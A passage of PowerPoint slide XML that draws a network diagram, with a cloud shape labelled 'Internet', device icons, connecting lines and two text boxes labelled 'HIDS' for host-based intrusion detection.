                        <p:spPr>
                          <a:xfrm>
                            <a:off x="10440" y="8280"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="72" name="Object 136"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="10920" y="8160"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7360" r:id="rId17" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId17" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="72" name="Object 136"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="10920" y="8160"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="46" name="Text Box 73"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="10887" y="5363"/>
                <a:ext cx="1428" cy="1337"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF66"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marR="0" defTabSz="914400" fontAlgn="auto">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:effectLst>
                      <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                        <a:srgbClr val="FFFFFF"/>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>HIDS</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Text Box 83"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="10919" y="8745"/>
                <a:ext cx="1427" cy="1337"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF66"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marR="0" defTabSz="914400" fontAlgn="auto">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:effectLst>
                      <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                        <a:srgbClr val="FFFFFF"/>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>HIDS</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="54" name="组合 53"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10358" y="6892"/>
              <a:ext cx="5013" cy="1781"/>
              <a:chOff x="469" y="6240"/>
              <a:chExt cx="9491" cy="2679"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129027" name="Freeform 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4320" y="6240"/>
                <a:ext cx="3263" cy="2198"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="2147483647" y="2147483647"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="2147483647" y="0"/>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57" h="717">
                    <a:moveTo>
                      <a:pt x="289" y="50"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="312" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="487" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="731" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="835" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="870" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="917" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="963" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="998" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1021" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1033" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1033" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1021" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="998" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1033" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1044" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1056" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1033" y="527"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1010" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="986" y="565"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="940" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="847" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="731" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="565"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="50"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="5B6976"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="C5E2FF"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="5B6976"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
                <a:tileRect/>
              </a:gradFill>
              <a:ln w="9525">
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="Rectangle 5"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4799" y="6360"/>
                <a:ext cx="2103" cy="545"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="99966" tIns="49983" rIns="99966" bIns="49983">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="991870" rtl="0" eaLnBrk="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="100000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:effectLst>
                      <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                        <a:srgbClr val="C0C0C0"/>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>Internet</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129031" name="Line 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5640" y="7440"/>
                <a:ext cx="4320" cy="3"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="38100" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="none" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:sp>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="56" name="Object 107"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="3120" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7361" r:id="rId18" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId18" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="56" name="Object 107"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="3120" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="57" name="Object 108"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="1245" y="6600"/>
              <a:ext cx="1995" cy="1530"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7362" r:id="rId19" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId19" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="57" name="Object 108"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="1245" y="6600"/>
                            <a:ext cx="1995" cy="1530"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="61" name="Object 109"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="3600" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7363" r:id="rId20" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId20" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="61" name="Object 109"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="3600" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="110" name="Object 110"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="4080" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7364" r:id="rId21" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId21" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="110" name="Object 110"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="4080" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="123" name="Object 111"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="4560" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7365" r:id="rId22" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId22" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="123" name="Object 111"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="4560" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="124" name="Object 117"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="2165" y="7003"/>
              <a:ext cx="1195" cy="917"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7366" r:id="rId23" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId23" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="124" name="Object 117"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="2165" y="7003"/>
                            <a:ext cx="1195" cy="917"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="125" name="Object 118"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="5035" y="7200"/>
              <a:ext cx="605" cy="465"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s7367" r:id="rId24" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj r:id="rId24" imgW="1270635" imgH="967105" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="125" name="Object 118"/>
                          <p:cNvPicPr/>
                          <p:nvPr/>
                        </p:nvPicPr>
                        <p:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </p:blipFill>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="5035" y="7200"/>
                            <a:ext cx="605" cy="465"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </p:spPr>
                      </p:pic>
                    </p:oleObj>
                  </mc:Fallback>
                </mc:AlternateContent>
              </a:graphicData>
            </a:graphic>
          </p:graphicFrame>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129064" name="AutoShape 41"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="-5400000">
                <a:off x="5700" y="3540"/>
                <a:ext cx="720" cy="7800"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 77037"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="folHlink">
                  <a:alpha val="50194"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="none" w="med" len="med"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="129065" name="Text Box 42"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
